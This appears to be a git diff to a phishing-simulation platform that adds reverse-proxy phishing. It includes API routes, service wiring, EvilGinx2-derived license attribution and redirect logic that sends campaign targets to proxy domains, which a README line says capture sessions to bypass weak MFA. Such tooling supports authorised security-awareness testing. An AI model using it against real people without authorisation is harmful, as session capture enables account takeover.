diff --git a/README.md b/README.md index 3b90601..3e1d123 100644 --- a/README.md +++ b/README.md @@ -23,6 +23,8 @@ For a manual step by step guide or more in depth installation information - [cli ## Features - **Multi-stage phishing flows** - Put together multiple phishing pages +- **Reverse proxy phishing** - Capture sessions to bypass weak MFA +- **Domain proxying** - Configure domains to proxy and mirror content from target sites - **Flexible scheduling** - Time windows, business hours, or manual delivery - **Multiple domains** - Auto TLS, custom sites, asset management - **Advanced delivery** - SMTP configs or custom API endpoints @@ -117,9 +119,12 @@ Visit the [Phishing Club Guide](https://phishing.club/guide/introduction/) for m | 8102 | Mail Server | Mailpit SMTP server with SpamAssassin integration | | 8103 | Container Logs | Dozzle log viewer | | 8104 | Container Stats | Docker container statistics | +| 8105 | MITMProxy | MITMProxy web interface | +| 8106 | MITMProxy | MITMProxy external access | | 8201 | ACME Server | Pebble ACME server for certificates | | 8202 | ACME Management | Pebble management interface | + ## Development Commands The `makefile` has a lot of convenience commands for development. diff --git a/THIRD_PARTY_LICENSES.md b/THIRD_PARTY_LICENSES.md new file mode 100644 index 0000000..e3972c4 --- /dev/null +++ b/THIRD_PARTY_LICENSES.md @@ -0,0 +1,64 @@ +# Third-Party Licenses +This file includes licenses from projects that are not dependencies but are included in some modified way. +
+This project incorporates code from third-party sources under different licenses. 
While the overall project is licensed under AGPL-3.0, the following components retain their original licenses: + +## EvilGinx2 + +**Source**: https://github.com/kgretzky/evilginx2 +**License**: BSD-3-Clause +**Copyright**: Copyright (c) 2017-2023 Kuba Gretzky (@kgretzky) +**Usage**: Portions of the HTTP proxy functionality in `backend/proxy/proxy.go` are derived from EvilGinx2 + +### BSD-3-Clause License Text + +``` +Copyright (c) 2017-2023 Kuba Gretzky (@kgretzky) +All rights reserved. + +Redistribution and use in source and binary forms, with or without +modification, are permitted provided that the following conditions are met: + +1. Redistributions of source code must retain the above copyright notice, this + list of conditions and the following disclaimer. + +2. Redistributions in binary form must reproduce the above copyright notice, + this list of conditions and the following disclaimer in the documentation + and/or other materials provided with the distribution. + +3. Neither the name of the copyright holder nor the names of its + contributors may be used to endorse or promote products derived from + this software without specific prior written permission. + +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" +AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE +IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE +DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE +FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL +DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER +CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, +OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE +OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
+``` + +## Bettercap + +**Source**: https://github.com/bettercap/bettercap +**License**: GPL-3.0 +**Copyright**: Copyright (c) 2016-2023 Simone Margaritelli (@evilsocket) +**Usage**: Portions of the HTTP proxy functionality (via EvilGinx2) are derived from Bettercap + +Note: EvilGinx2 itself incorporates and acknowledges code from the Bettercap project. Our usage maintains this attribution chain. + +--- + +## License Compatibility + +This project combines code under different licenses: + +- **Overall Project**: AGPL-3.0 (see main LICENSE file) +- **BSD-3-Clause Components**: Compatible with AGPL-3.0, incorporated with proper attribution +- **GPL-3.0 Components**: Compatible with AGPL-3.0 through inheritance chain + +All components are properly attributed and their usage complies with their respective license terms. diff --git a/backend/app/administration.go b/backend/app/administration.go index d82f556..51fc974 100644 --- a/backend/app/administration.go +++ b/backend/app/administration.go @@ -88,6 +88,10 @@ const ( ROUTE_V1_PAGE_OVERVIEW = "/api/v1/page/overview" ROUTE_V1_PAGE_ID = "/api/v1/page/:id" ROUTE_V1_PAGE_CONTENT_ID = "/api/v1/page/:id/content" + // proxy + ROUTE_V1_PROXY = "/api/v1/proxy" + ROUTE_V1_PROXY_OVERVIEW = "/api/v1/proxy/overview" + ROUTE_V1_PROXY_ID = "/api/v1/proxy/:id" // recipient and groups ROUTE_V1_RECIPIENT = "/api/v1/recipient" ROUTE_V1_RECIPIENT_IMPORT = "/api/v1/recipient/import" @@ -320,6 +324,13 @@ func setupRoutes( POST(ROUTE_V1_PAGE, middleware.SessionHandler, controllers.Page.Create). PATCH(ROUTE_V1_PAGE_ID, middleware.SessionHandler, controllers.Page.UpdateByID). DELETE(ROUTE_V1_PAGE_ID, middleware.SessionHandler, controllers.Page.DeleteByID). + // proxy + GET(ROUTE_V1_PROXY, middleware.SessionHandler, controllers.Proxy.GetAll). + GET(ROUTE_V1_PROXY_OVERVIEW, middleware.SessionHandler, controllers.Proxy.GetOverview). + GET(ROUTE_V1_PROXY_ID, middleware.SessionHandler, controllers.Proxy.GetByID). 
+ POST(ROUTE_V1_PROXY, middleware.SessionHandler, controllers.Proxy.Create). + PATCH(ROUTE_V1_PROXY_ID, middleware.SessionHandler, controllers.Proxy.UpdateByID). + DELETE(ROUTE_V1_PROXY_ID, middleware.SessionHandler, controllers.Proxy.DeleteByID). // smtp configuration GET(ROUTE_V1_SMTP_CONFIGURATION, middleware.SessionHandler, controllers.SMTPConfiguration.GetAll). GET(ROUTE_V1_SMTP_CONFIGURATION_ID, middleware.SessionHandler, controllers.SMTPConfiguration.GetByID). diff --git a/backend/app/controllers.go b/backend/app/controllers.go index 943206e..fe2ad32 100644 --- a/backend/app/controllers.go +++ b/backend/app/controllers.go @@ -15,6 +15,7 @@ type Controllers struct { Installer *controller.Install InitialSetup *controller.InitialSetup Page *controller.Page + Proxy *controller.Proxy Log *controller.Log Option *controller.Option User *controller.User @@ -101,6 +102,10 @@ func NewControllers( PageService: services.Page, TemplateService: services.Template, } + proxy := &controller.Proxy{ + Common: common, + ProxyService: services.Proxy, + } option := &controller.Option{ Common: common, OptionService: services.Option, @@ -182,6 +187,7 @@ func NewControllers( InitialSetup: initialSetup, Health: health, Page: page, + Proxy: proxy, Log: log, Option: option, User: user, diff --git a/backend/app/repositories.go b/backend/app/repositories.go index a4e40a6..7139eff 100644 --- a/backend/app/repositories.go +++ b/backend/app/repositories.go @@ -12,6 +12,7 @@ type Repositories struct { Company *repository.Company Option *repository.Option Page *repository.Page + Proxy *repository.Proxy Role *repository.Role Session *repository.Session User *repository.User @@ -40,6 +41,7 @@ func NewRepositories( Company: &repository.Company{DB: db}, Option: option, Page: &repository.Page{DB: db}, + Proxy: &repository.Proxy{DB: db}, Role: &repository.Role{DB: db}, Session: &repository.Session{DB: db}, User: &repository.User{DB: db}, diff --git a/backend/app/server.go b/backend/app/server.go 
index df1978c..8a59fe5 100644 --- a/backend/app/server.go +++ b/backend/app/server.go @@ -9,6 +9,7 @@ import ( "mime" "net" "net/http" + "net/url" "os" "path/filepath" "strings" @@ -16,6 +17,7 @@ import ( "time" "github.com/go-errors/errors" + "gopkg.in/yaml.v3" "github.com/caddyserver/certmagic" securejoin "github.com/cyphar/filepath-securejoin" @@ -27,6 +29,7 @@ import ( "github.com/phishingclub/phishingclub/database" "github.com/phishingclub/phishingclub/errs" "github.com/phishingclub/phishingclub/model" + "github.com/phishingclub/phishingclub/proxy" "github.com/phishingclub/phishingclub/repository" "github.com/phishingclub/phishingclub/server" "github.com/phishingclub/phishingclub/service" @@ -50,6 +53,7 @@ type Server struct { controllers *Controllers services *Services repositories *Repositories + proxyServer *proxy.ProxyHandler } // NewServer returns a new server @@ -63,6 +67,38 @@ func NewServer( logger *zap.SugaredLogger, certMagicConfig *certmagic.Config, ) *Server { + // setup proxy cookie tracking + cookieName := "" + if option, err := repositories.Option.GetByKey(context.Background(), data.OptionKeyProxyCookieName); err == nil && option != nil { + cookieName = option.Value.String() + } + + // setup goproxy-based proxy server + proxyServer := proxy.NewProxyHandler( + logger, + repositories.Page, + repositories.CampaignRecipient, + repositories.Campaign, + repositories.CampaignTemplate, + repositories.Domain, + repositories.Proxy, + repositories.Identifier, + services.Campaign, + cookieName, + ) + + // setup proxy session cleanup routine + go func() { + ticker := time.NewTicker(5 * time.Minute) + defer ticker.Stop() + for { + select { + case <-ticker.C: + proxyServer.CleanupExpiredSessions() + } + } + }() + return &Server{ staticPath: staticPath, ownManagedTLSCertPath: ownManagedTLSCertPath, @@ -72,6 +108,7 @@ func NewServer( repositories: repositories, logger: logger, certMagicConfig: certMagicConfig, + proxyServer: proxyServer, } } @@ -233,21 +270,36 
@@ func (s *Server) checkAndServeSharedAsset(c *gin.Context) bool { // checks if the request should be redirected // checks if the request is for a static page or static not found page func (s *Server) Handler(c *gin.Context) { + // add error recovery for handler + defer func() { + if r := recover(); r != nil { + s.logger.Errorw("panic in handler", + "panic", r, + "host", c.Request.Host, + "url", c.Request.URL.String(), + ) + c.Status(http.StatusInternalServerError) + c.Abort() + } + }() + host, err := s.getHostOnly(c.Request.Host) if err != nil { s.logger.Debugw("failed to parse host", + "rawHost", c.Request.Host, "error", err, ) c.Status(http.StatusNotFound) c.Abort() return } + // check if the domain is valid // use DB directly here to avoid getting unnecessary data // as a domain contains big blobs for static content var domain *database.Domain res := s.db. - Select("id, name, host_website, redirect_url"). + Select("id, name, type, proxy_id, proxy_target_domain, host_website, redirect_url"). Where("name = ?", host). 
First(&domain) @@ -257,6 +309,26 @@ func (s *Server) Handler(c *gin.Context) { c.Abort() return } + + // check if this is a proxy domain - if so, handle it with proxy server + if domain.Type == "proxy" { + s.logger.Debugw("handling proxy domain request", + "host", host, + "targetDomain", domain.ProxyTargetDomain, + "path", c.Request.URL.Path, + ) + err = s.proxyServer.HandleHTTPRequest(c.Writer, c.Request, domain) + if err != nil { + s.logger.Errorw("failed to handle proxy request", + "error", err, + "host", host, + ) + c.Status(http.StatusInternalServerError) + } + c.Abort() + return + } + // check if the request is for a tacking pixel if c.Request.URL.Path == "/wf/open" { s.controllers.Campaign.TrackingPixel(c) @@ -265,6 +337,8 @@ func (s *Server) Handler(c *gin.Context) { } // check if the request is for a phishing page or is denied by allow/deny list + // this must come BEFORE proxy cookie check to ensure initial requests with campaign recipient IDs + // are treated as initial requests even if they have existing proxy cookies isRequestForPhishingPageOrDenied, err := s.checkAndServePhishingPage(c, domain) if err != nil { s.logger.Errorw("failed to serve phishing page", @@ -278,6 +352,20 @@ func (s *Server) Handler(c *gin.Context) { if isRequestForPhishingPageOrDenied { return } + + // check for proxy cookie - only if this wasn't a phishing page request + // this ensures that requests with campaign recipient IDs are handled as initial requests + if s.proxyServer.IsValidProxyCookie(s.getProxyCookieValue(c)) { + err = s.proxyServer.HandleHTTPRequest(c.Writer, c.Request, domain) + if err != nil { + s.logger.Errorw("failed to handle proxy request", + "error", err, + ) + c.Status(http.StatusInternalServerError) + } + c.Abort() + return + } // check if the request is for assets servedAssets := s.checkAndServeAssets(c, host) if servedAssets { @@ -458,65 +546,26 @@ func (s *Server) checkAndServePhishingPage( c *gin.Context, domain *database.Domain, ) (bool, error) { - // 
get all identifiers and collect all that match query params - identifiers, err := s.repositories.Identifier.GetAll(c, &repository.IdentifierOption{}) + // get campaign recipient from URL parameters + campaignRecipient, _, err := server.GetCampaignRecipientFromURLParams( + c, + c.Request, + s.repositories.Identifier, + s.repositories.CampaignRecipient, + ) if err != nil { - s.logger.Debugw("failed to get all identifiers", + s.logger.Debugw("failed to get campaign recipient from URL parameters", "error", err, ) return false, errs.Wrap(err) } - query := c.Request.URL.Query() - matchingParams := []string{} - for _, identifier := range identifiers.Rows { - if name := identifier.Name.MustGet(); query.Has(name) { - matchingParams = append(matchingParams, name) - } - } - // check which match a UUIDv4 and check if any of those match a campaignrecipient id - matchingUUIDParams := []*uuid.UUID{} - for _, param := range matchingParams { - if id, err := uuid.Parse(query.Get(param)); err == nil { - matchingUUIDParams = append(matchingUUIDParams, &id) - } - } - if len(matchingUUIDParams) == 0 { - s.logger.Debugw("'campaignrecipient' not found", - "error", err, - ) - return false, nil - } - var campaignRecipient *model.CampaignRecipient - var campaignRecipientID *uuid.UUID - // however limit it to 3 attempts to prevent a DoS attack - for i, v := range matchingUUIDParams { - if i > 2 { - s.logger.Warn("too many attempts to get campaign recipient by a UUID. 
Ensure that there are no more than max 3 UUID in the phishing URL!") - return false, nil - } - campaignRecipient, err = s.repositories.CampaignRecipient.GetByCampaignRecipientID( - c, - v, - ) - if err != nil && !errors.Is(err, gorm.ErrRecordNotFound) { - s.logger.Debugw("failed to get active campaign and campaign recipient by query param", - "error", err, - ) - return false, fmt.Errorf("failed to get active campaign and campaign recipient by query param: %s", err) - } - if campaignRecipient != nil { - campaignRecipientID = v - break - } - } - // there was a campagin recipient id but it did not match a campaign - // this could be because there is an ID value but is not for us if campaignRecipient == nil { - s.logger.Debugw("'campaignrecipient' not found", - "error", err, - ) + s.logger.Debugw("'campaignrecipient' not found") return false, nil } + + campaignRecipientID := campaignRecipient.ID.MustGet() + campaignRecipientIDPtr := &campaignRecipientID // at this point we know which url param matched the campaignrecipientID, however // it could have been any available identifier and not the one matching the campaign template // it is possible now to check if it is correct, however it does not matter as the campaign @@ -587,16 +636,29 @@ func (s *Server) checkAndServePhishingPage( } // figure out which page types this template has var beforePageID *uuid.UUID + var beforeProxyID *uuid.UUID if v, err := cTemplate.BeforeLandingPageID.Get(); err == nil { beforePageID = &v + } else if v, err := cTemplate.BeforeLandingProxyID.Get(); err == nil { + beforeProxyID = &v } - landingPageID, err := cTemplate.LandingPageID.Get() - if err != nil { - return false, fmt.Errorf("Template is incomplete, missing landing page ID: %s", err) + + var landingPageID *uuid.UUID + var landingProxyID *uuid.UUID + if v, err := cTemplate.LandingPageID.Get(); err == nil { + landingPageID = &v + } else if v, err := cTemplate.LandingProxyID.Get(); err == nil { + landingProxyID = &v + } else { + return 
false, fmt.Errorf("Template is incomplete, missing landing page or Proxy ID") } + var afterPageID *uuid.UUID + var afterProxyID *uuid.UUID if v, err := cTemplate.AfterLandingPageID.Get(); err == nil { afterPageID = &v + } else if v, err := cTemplate.AfterLandingProxyID.Get(); err == nil { + afterProxyID = &v } stateParamKey := cTemplate.StateIdentifier.Name.MustGet() @@ -608,17 +670,50 @@ func (s *Server) checkAndServePhishingPage( } // if there is no page type then this is the before landing page or the landing page var pageID *uuid.UUID + var proxyID *uuid.UUID nextPageType := "" currentPageType := "" + + s.logger.Debugw("determining page flow", + "pageTypeQuery", pageTypeQuery, + "hasBeforePage", beforePageID != nil, + "hasBeforeProxy", beforeProxyID != nil, + "hasLandingPage", landingPageID != nil, + "hasLandingProxy", landingProxyID != nil, + "hasAfterPage", afterPageID != nil, + "hasAfterProxy", afterProxyID != nil, + "campaignRecipientID", campaignRecipientID.String(), + ) + if len(pageTypeQuery) == 0 { - if beforePageID != nil { - pageID = beforePageID + if beforePageID != nil || beforeProxyID != nil { + if beforePageID != nil { + pageID = beforePageID + s.logger.Debugw("initial request - serving before landing page", + "pageID", pageID.String(), + ) + } else { + proxyID = beforeProxyID + s.logger.Debugw("initial request - serving before landing Proxy", + "proxyID", proxyID.String(), + ) + } currentPageType = data.PAGE_TYPE_BEFORE nextPageType = data.PAGE_TYPE_LANDING } else { - pageID = &landingPageID + if landingPageID != nil { + pageID = landingPageID + s.logger.Debugw("initial request - serving landing page", + "pageID", pageID.String(), + ) + } else { + proxyID = landingProxyID + s.logger.Debugw("initial request - serving landing Proxy", + "proxyID", proxyID.String(), + ) + } currentPageType = data.PAGE_TYPE_LANDING - if afterPageID != nil { + if afterPageID != nil || afterProxyID != nil { nextPageType = data.PAGE_TYPE_AFTER } else { nextPageType = 
data.PAGE_TYPE_DONE // landing page is final page @@ -631,28 +726,70 @@ func (s *Server) checkAndServePhishingPage( case data.PAGE_TYPE_BEFORE: // this is set if the previous page was a before page case data.PAGE_TYPE_LANDING: - pageID = &landingPageID + if landingPageID != nil { + pageID = landingPageID + s.logger.Debugw("serving landing page from state", + "pageID", pageID.String(), + ) + } else { + proxyID = landingProxyID + s.logger.Debugw("serving landing Proxy from state", + "proxyID", proxyID.String(), + ) + } currentPageType = data.PAGE_TYPE_LANDING - if afterPageID != nil { + if afterPageID != nil || afterProxyID != nil { nextPageType = data.PAGE_TYPE_AFTER } else { - nextPageType = data.PAGE_TYPE_DONE // landiung page is final page + nextPageType = data.PAGE_TYPE_DONE // landing page is final page } // this is set if the previous page was a landing page case data.PAGE_TYPE_AFTER: if afterPageID != nil { pageID = afterPageID + s.logger.Debugw("serving after landing page from state", + "pageID", pageID.String(), + ) + } else if afterProxyID != nil { + proxyID = afterProxyID + s.logger.Debugw("serving after landing Proxy from state", + "proxyID", proxyID.String(), + ) + } else if landingPageID != nil { + pageID = landingPageID + s.logger.Debugw("fallback to landing page for after state", + "pageID", pageID.String(), + ) } else { - pageID = &landingPageID + proxyID = landingProxyID + s.logger.Debugw("fallback to landing Proxy for after state", + "proxyID", proxyID.String(), + ) } - // next page after a after landinge page, is the same page + // next page after a after landing page, is the same page currentPageType = data.PAGE_TYPE_AFTER nextPageType = data.PAGE_TYPE_DONE case data.PAGE_TYPE_DONE: if afterPageID != nil { pageID = afterPageID + s.logger.Debugw("serving after landing page for done state", + "pageID", pageID.String(), + ) + } else if afterProxyID != nil { + proxyID = afterProxyID + s.logger.Debugw("serving after landing Proxy for done state", + 
"proxyID", proxyID.String(), + ) + } else if landingPageID != nil { + pageID = landingPageID + s.logger.Debugw("fallback to landing page for done state", + "pageID", pageID.String(), + ) } else { - pageID = &landingPageID + proxyID = landingProxyID + s.logger.Debugw("fallback to landing Proxy for done state", + "proxyID", proxyID.String(), + ) } currentPageType = data.PAGE_TYPE_DONE nextPageType = data.PAGE_TYPE_DONE @@ -715,7 +852,7 @@ func (s *Server) checkAndServePhishingPage( campaignRecipient.NotableEventID.Set(*submitDataEventID) err := s.repositories.CampaignRecipient.UpdateByID( c, - campaignRecipientID, + campaignRecipientIDPtr, campaignRecipient, ) if err != nil { @@ -766,7 +903,252 @@ func (s *Server) checkAndServePhishingPage( } } } - // fetch the page + + // handle Proxy pages + if proxyID != nil { + // this is a Proxy page - redirect to the phishing domain + proxy, err := s.repositories.Proxy.GetByID( + c, + proxyID, + &repository.ProxyOption{}, + ) + if err != nil { + return true, fmt.Errorf("failed to get Proxy page: %s", err) + } + + startURL, err := proxy.StartURL.Get() + if err != nil { + return true, fmt.Errorf("Proxy page has no start URL: %s", err) + } + + // parse proxy config to find the phishing domain + proxyConfig, err := proxy.ProxyConfig.Get() + if err != nil { + return true, fmt.Errorf("Proxy page has no configuration: %s", err) + } + + // extract the phishing domain from Proxy configuration + var rawConfig map[string]interface{} + err = yaml.Unmarshal([]byte(proxyConfig.String()), &rawConfig) + if err != nil { + return true, fmt.Errorf("invalid Proxy configuration YAML: %s", err) + } + + // parse the start URL to get the target domain + parsedStartURL, err := url.Parse(startURL.String()) + if err != nil { + return true, fmt.Errorf("invalid proxy start URL: %s", err) + } + startDomain := parsedStartURL.Host + + // find the phishing domain mapping for the start URL domain + phishingDomain := "" + for originalHost, domainData := range 
rawConfig { + if originalHost == "proxy" || originalHost == "global" { + continue + } + if originalHost == startDomain { + if domainMap, ok := domainData.(map[string]interface{}); ok { + if to, exists := domainMap["to"]; exists { + if toStr, ok := to.(string); ok { + phishingDomain = toStr + break + } + } + } + } + } + + if phishingDomain == "" { + return true, fmt.Errorf("no phishing domain mapping found for start URL domain: %s", startDomain) + } + + // save the event of Proxy page being accessed + visitEventID := uuid.New() + eventName := "" + switch currentPageType { + case data.PAGE_TYPE_BEFORE: + eventName = data.EVENT_CAMPAIGN_RECIPIENT_BEFORE_PAGE_VISITED + case data.PAGE_TYPE_LANDING: + eventName = data.EVENT_CAMPAIGN_RECIPIENT_PAGE_VISITED + case data.PAGE_TYPE_AFTER: + eventName = data.EVENT_CAMPAIGN_RECIPIENT_AFTER_PAGE_VISITED + default: + eventName = data.EVENT_CAMPAIGN_RECIPIENT_PAGE_VISITED + } + eventID := cache.EventIDByName[eventName] + clientIP := vo.NewOptionalString64Must(c.ClientIP()) + userAgent := vo.NewOptionalString255Must(utils.Substring(c.Request.UserAgent(), 0, MAX_USER_AGENT_SAVED)) + var visitEvent *model.CampaignEvent + if !campaign.IsAnonymous.MustGet() { + visitEvent = &model.CampaignEvent{ + ID: &visitEventID, + CampaignID: &campaignID, + RecipientID: &recipientID, + IP: clientIP, + UserAgent: userAgent, + EventID: eventID, + Data: vo.NewEmptyOptionalString1MB(), + } + } else { + ua := vo.NewEmptyOptionalString255() + visitEvent = &model.CampaignEvent{ + ID: &visitEventID, + CampaignID: &campaignID, + RecipientID: nil, + IP: vo.NewEmptyOptionalString64(), + UserAgent: ua, + EventID: eventID, + Data: vo.NewEmptyOptionalString1MB(), + } + } + + // save the visit event unless it's the final page repeat + if currentPageType != data.PAGE_TYPE_DONE { + err = s.repositories.Campaign.SaveEvent( + c, + visitEvent, + ) + if err != nil { + s.logger.Errorw("failed to save proxy visit event", + "error", err, + "proxyID", proxyID.String(), + ) 
+ } + + // check and update if most notable event for recipient + currentNotableEventID, _ := campaignRecipient.NotableEventID.Get() + if cache.IsMoreNotableCampaignRecipientEventID( + ¤tNotableEventID, + eventID, + ) { + campaignRecipient.NotableEventID.Set(*eventID) + err := s.repositories.CampaignRecipient.UpdateByID( + c, + campaignRecipientIDPtr, + campaignRecipient, + ) + if err != nil { + s.logger.Errorw("failed to update notable event for proxy", + "campaignRecipientID", campaignRecipientID.String(), + "eventID", eventID.String(), + "error", err, + ) + } + } + } + + // handle webhook for Proxy page visit + webhookID, err := s.repositories.Campaign.GetWebhookIDByCampaignID( + c, + &campaignID, + ) + if err != nil && !errors.Is(err, gorm.ErrRecordNotFound) { + s.logger.Errorw("failed to get webhook id by campaign id for proxy", + "campaignID", campaignID.String(), + "error", err, + ) + } + if webhookID != nil && currentPageType != data.PAGE_TYPE_DONE { + err = s.services.Campaign.HandleWebhook( + // TODO this should be tied to a application wide context not the request + context.TODO(), + webhookID, + &campaignID, + &recipientID, + eventName, + ) + if err != nil { + s.logger.Errorw("failed to handle webhook for Proxy page", + "error", err, + "proxyID", proxyID.String(), + ) + } + } + + // validate phishing domain format + if strings.Contains(phishingDomain, "://") || strings.Contains(phishingDomain, "/") { + return true, fmt.Errorf("invalid phishing domain format: %s", phishingDomain) + } + + // validate that the phishing domain is configured as a proxy domain + var phishingDomainRecord *database.Domain + res := s.db. + Select("id, name, type, proxy_id, proxy_target_domain"). + Where("name = ?", phishingDomain). 
+ First(&phishingDomainRecord) + + if res.RowsAffected == 0 { + return true, fmt.Errorf("phishing domain '%s' is not configured in the system", phishingDomain) + } + + if phishingDomainRecord.Type != "proxy" { + return true, fmt.Errorf("phishing domain '%s' is not configured as proxy type", phishingDomain) + } + + s.logger.Debugw("redirecting to Proxy phishing domain", + "proxyID", proxyID.String(), + "startURL", startURL.String(), + "phishingDomain", phishingDomain, + "currentPageType", currentPageType, + "phishingDomainType", phishingDomainRecord.Type, + ) + + // build the redirect URL to the phishing domain with campaign recipient ID + urlParam := cTemplate.URLIdentifier.Name.MustGet() + + // construct the redirect URL properly + u := &url.URL{ + Scheme: "https", + Host: phishingDomain, + Path: parsedStartURL.Path, + } + + q := u.Query() + q.Set(urlParam, campaignRecipientID.String()) + if encryptedParam != "" { + q.Set(stateParamKey, encryptedParam) + } + // preserve any existing query params from start URL + if parsedStartURL.RawQuery != "" { + startQuery, _ := url.ParseQuery(parsedStartURL.RawQuery) + for key, values := range startQuery { + for _, value := range values { + q.Add(key, value) + } + } + } + u.RawQuery = q.Encode() + + s.logger.Debugw("built proxy redirect URL", + "redirectURL", u.String(), + "phishingDomain", phishingDomain, + "originalPath", parsedStartURL.Path, + ) + + // validate the final URL + finalURL := u.String() + if !strings.HasPrefix(finalURL, "https://") { + return true, fmt.Errorf("invalid redirect URL scheme: %s", finalURL) + } + + s.logger.Infow("redirecting to proxy domain", + "from", c.Request.Host+c.Request.URL.Path, + "to", finalURL, + "campaignRecipientID", campaignRecipientID.String(), + ) + + c.Redirect(http.StatusSeeOther, finalURL) + c.Abort() + return true, nil + } + + // ensure we have a page ID if we're not handling a proxy + if pageID == nil { + return true, fmt.Errorf("no page or proxy configured for current step") + 
} + + // fetch the regular page page, err := s.repositories.Page.GetByID( c, pageID, @@ -775,6 +1157,7 @@ func (s *Server) checkAndServePhishingPage( if err != nil { return true, fmt.Errorf("failed to get landing page: %s", err) } + // fetch the sender email to use for the template emailID := cTemplate.EmailID.MustGet() email, err := s.repositories.Email.GetByID( @@ -794,7 +1177,7 @@ func (s *Server) checkAndServePhishingPage( c, domain, email, - campaignRecipientID, + campaignRecipientIDPtr, recipient, page, cTemplate, @@ -860,7 +1243,7 @@ func (s *Server) checkAndServePhishingPage( campaignRecipient.NotableEventID.Set(*eventID) err := s.repositories.CampaignRecipient.UpdateByID( c, - campaignRecipientID, + campaignRecipientIDPtr, campaignRecipient, ) if err != nil { @@ -950,6 +1333,15 @@ func (s *Server) AssignRoutes(r *gin.Engine) { r.NoRoute(s.handlerNotFound) } +// getProxyCookieValue extracts proxy cookie value from gin context +func (s *Server) getProxyCookieValue(c *gin.Context) string { + cookieName := s.proxyServer.GetCookieName() + if cookieValue, err := c.Cookie(cookieName); err == nil { + return cookieValue + } + return "" +} + func (s *Server) StartHTTP( r *gin.Engine, conf *config.Config, diff --git a/backend/app/services.go b/backend/app/services.go index daab92b..703c420 100644 --- a/backend/app/services.go +++ b/backend/app/services.go @@ -16,6 +16,7 @@ type Services struct { InstallSetup *service.InstallSetup Option *service.Option Page *service.Page + Proxy *service.Proxy Session *service.Session User *service.User Domain *service.Domain @@ -141,6 +142,7 @@ func NewServices( PageRepository: repositories.Page, CampaignTemplateService: campaignTemplate, TemplateService: templateService, + DomainRepository: repositories.Domain, } domain := &service.Domain{ Common: common, @@ -154,6 +156,14 @@ func NewServices( FileService: file, TemplateService: templateService, } + proxy := &service.Proxy{ + Common: common, + ProxyRepository: repositories.Proxy, + 
DomainRepository: repositories.Domain, + CampaignRepository: repositories.Campaign, + CampaignTemplateService: campaignTemplate, + DomainService: domain, + } email := &service.Email{ Common: common, AttachmentPath: attachmentPath, @@ -242,6 +252,7 @@ func NewServices( InstallSetup: installSetup, Option: optionService, Page: page, + Proxy: proxy, Session: sessionService, User: userService, Domain: domain, diff --git a/backend/controller/campaignTemplate.go b/backend/controller/campaignTemplate.go index 01adf7b..05abe87 100644 --- a/backend/controller/campaignTemplate.go +++ b/backend/controller/campaignTemplate.go @@ -75,14 +75,17 @@ func (c *CampaignTemplate) GetByID(g *gin.Context) { _, ok = g.GetQuery("full") if ok { options = &repository.CampaignTemplateOption{ - WithDomain: true, - WithSMTPConfiguration: true, - WithAPISender: true, - WithEmail: true, - WithLandingPage: true, - WithBeforeLandingPage: true, - WithAfterLandingPage: true, - WithIdentifier: true, + WithDomain: true, + WithSMTPConfiguration: true, + WithAPISender: true, + WithEmail: true, + WithLandingPage: true, + WithBeforeLandingPage: true, + WithAfterLandingPage: true, + WithLandingProxy: true, + WithBeforeLandingProxy: true, + WithAfterLandingProxy: true, + WithIdentifier: true, } } // get @@ -130,16 +133,19 @@ func (c *CampaignTemplate) GetAll(g *gin.Context) { companyID, pagination, &repository.CampaignTemplateOption{ - QueryArgs: queryArgs, - Columns: columns, - WithDomain: true, - WithSMTPConfiguration: true, - WithAPISender: true, - WithEmail: true, - WithLandingPage: true, - WithBeforeLandingPage: true, - WithAfterLandingPage: true, - UsableOnly: usableOnly, + QueryArgs: queryArgs, + Columns: columns, + WithDomain: true, + WithSMTPConfiguration: true, + WithAPISender: true, + WithEmail: true, + WithLandingPage: true, + WithBeforeLandingPage: true, + WithAfterLandingPage: true, + WithLandingProxy: true, + WithBeforeLandingProxy: true, + WithAfterLandingProxy: true, + UsableOnly: 
usableOnly, }, ) // handle response diff --git a/backend/controller/proxy.go b/backend/controller/proxy.go new file mode 100644 index 0000000..77d87f9 --- /dev/null +++ b/backend/controller/proxy.go @@ -0,0 +1,194 @@ +package controller + +import ( + "github.com/gin-gonic/gin" + "github.com/phishingclub/phishingclub/database" + "github.com/phishingclub/phishingclub/model" + "github.com/phishingclub/phishingclub/repository" + "github.com/phishingclub/phishingclub/service" +) + +// ProxyColumnsMap is a map between the frontend and the backend +// so the frontend has user friendly names instead of direct references +// to the database schema +// this is tied to a slice in the repository package +var ProxyColumnsMap = map[string]string{ + "created_at": repository.TableColumn(database.PROXY_TABLE, "created_at"), + "updated_at": repository.TableColumn(database.PROXY_TABLE, "updated_at"), + "name": repository.TableColumn(database.PROXY_TABLE, "name"), + "target_domain": repository.TableColumn(database.PROXY_TABLE, "target_domain"), +} + +// Proxy is a proxy controller +type Proxy struct { + Common + ProxyService *service.Proxy +} + +// Create creates a proxy +func (m *Proxy) Create(g *gin.Context) { + // handle session + session, _, ok := m.handleSession(g) + if !ok { + return + } + // parse req + var req model.Proxy + if ok := m.handleParseRequest(g, &req); !ok { + return + } + // save proxy + id, err := m.ProxyService.Create( + g.Request.Context(), + session, + &req, + ) + // handle response + if ok := m.handleErrors(g, err); !ok { + return + } + m.Response.OK(g, map[string]string{ + "id": id.String(), + }) +} + +// GetOverview gets proxies overview using pagination +func (m *Proxy) GetOverview(g *gin.Context) { + session, _, ok := m.handleSession(g) + if !ok { + return + } + // parse request + queryArgs, ok := m.handleQueryArgs(g) + if !ok { + return + } + queryArgs.DefaultSortByUpdatedAt() + companyID := companyIDFromRequestQuery(g) + // get proxies + proxies, err := 
